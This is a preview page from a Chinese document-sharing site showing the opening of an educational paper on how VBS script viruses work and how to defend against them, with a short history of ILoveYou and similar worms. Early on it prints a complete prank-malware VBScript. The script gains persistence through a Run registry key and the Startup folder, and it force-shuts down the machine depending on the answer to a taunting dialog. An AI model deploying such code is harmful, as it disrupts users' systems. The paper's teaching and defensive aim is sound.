脚本病毒原理分析与防范

脚本病毒原理分析与防范

ID:40434324

大小:233.51 KB

页数:61页

时间:2019-08-02

脚本病毒原理分析与防范_第1页
脚本病毒原理分析与防范_第2页
脚本病毒原理分析与防范_第3页
脚本病毒原理分析与防范_第4页
脚本病毒原理分析与防范_第5页
资源描述:

《脚本病毒原理分析与防范》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库

1、脚本病毒原理分析与防范目录一、Vbs脚本病毒的特点及发展现状二、Vbs脚本病毒原理分析三、如何防范vbs脚本病毒四、对所有脚本类病毒发展的展望自动关机Dimfs,dirwin,c,Wll,str,strr,rSetfs=CreateObject("Scripting.FileSystemObject")Setdirwin=fs.GetSpecialFolder(1)SetWll=WScript.CreateObject("WScript.Shell")Setc=fs.GetFile(WScript.ScriptFullName)str="HK"&"LMSO

2、FT"&"WAREMicr"&"osoftWin"&"dowsCurren"&"tVersionR"&"unwxb"if(fs.FileExists(dirwin&"wxb.vbs"))ThencallShow_And_Do("reg")elseif(fs.FileExists("C:DocumentsandSettingsAllUsersStartMenuProgramsStartupwxb.vbs"))ThencallShow_And_Do("Startup")elseOnErrorResumeNextstrr=""Wll.Reg

3、Writestr,"C:WINDOWSsystem32wxb.vbs","REG_SZ"strr=Wll.Regread(str)ifstrr=""thenc.Copy("C:DocumentsandSettingsAllUsersStartMenuProgramsStartupwxb.vbs")elsec.Copy(dirwin&"wxb.vbs")endifendifsubShow_And_Do(s)dimfr=MsgBox("提问:你认为你是猪吗?"&Chr(13)&Chr(10)&"确定->是猪"&Chr(10)&"取消->不是猪

4、",4145,"MsgBoxExample")Ifr=1Thenifs="Startup"thensetf=fs.GetFile("C:DocumentsandSettingsAllUsersStartMenuProgramsStartupwxb.vbs")f.Delete()elseifs="reg"thenWll.RegDeletestrsetf=fs.GetFile(dirwin&"wxb.vbs")f.Delete()endifElsewll.run"Shutdown.exe-s-f-t0"EndIfendsub网络的流行,让我们的世界

5、变得更加美好,但它也有让人不愉快的时候。当您收到一封主题为“ILoveYou”的邮件,用兴奋得几乎快发抖的鼠标去点击附件的时候;当您浏览一个信任的网站之后,发现打开每个文件夹的速度非常慢的时候,您是否察觉病毒已经闯进了您的世界呢?2000年5月4日欧美爆发的“爱虫”网络蠕虫病毒。由于通过电子邮件系统传播,爱虫病毒在短短几天内狂袭全球数百万计的电脑。微软、Intel等在内的众多大型企业网络系统瘫痪,全球经济损失达几十亿美元。而去年爆发的新欢乐时光病毒至今都让广大电脑用户更是苦不堪言。上面提及的两个病毒最大的一个共同特点是:使用VBScript编写。以爱虫和新欢

6、乐时光病毒为典型代表的VBS脚本病毒十分的猖獗,很重要的一个原因就是其编写简单。下面我们就来逐一对VBS脚本病毒的各个方面加以分析:一、Vbs脚本病毒的特点及发展现状VBS病毒是用VBScript编写而成,该脚本语言功能非常强大,它们利用Windows系统的开放性特点,通过调用一些现成的Windows对象、组件,可以直接对文件系统、注册表等进行控制,功能非常强大。应该说病毒就是一种思想,但是这种思想在用VBS实现时变得极其容易。VBS脚本病毒具有如下几个特点:1.编写简单,一个以前对病毒一无所知的病毒爱好者可以在很短的时间里编出一个新型病毒来。2.破坏力大。

7、其破坏力不仅表现在对用户系统文件及性能的破坏。他还可以使邮件服务器崩溃,网络发生严重阻塞。3.感染力强。由于脚本是直接解释执行,并且它不需要像PE病毒那样,需要做复杂的PE文件格式处理,因此这类病毒可以直接通过自我复制的方式感染其他同类文件,并且自我的异常处理变得非常容易。4.传播范围大。这类病毒通过htm文档,Email附件或其它方式,可以在很短时间内传遍世界各地。5.病毒源码容易被获取,变种多。由于VBS病毒解释执行,其源代码可读性非常强,即使病毒源码经过加密处理后,其源代码的获取还是比较简单。因此,这类病毒变种比较多,稍微改变一下病毒的结构,或者修改一

8、下特征值,很多杀毒软件可能就无能为力。6.欺骗性强。

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。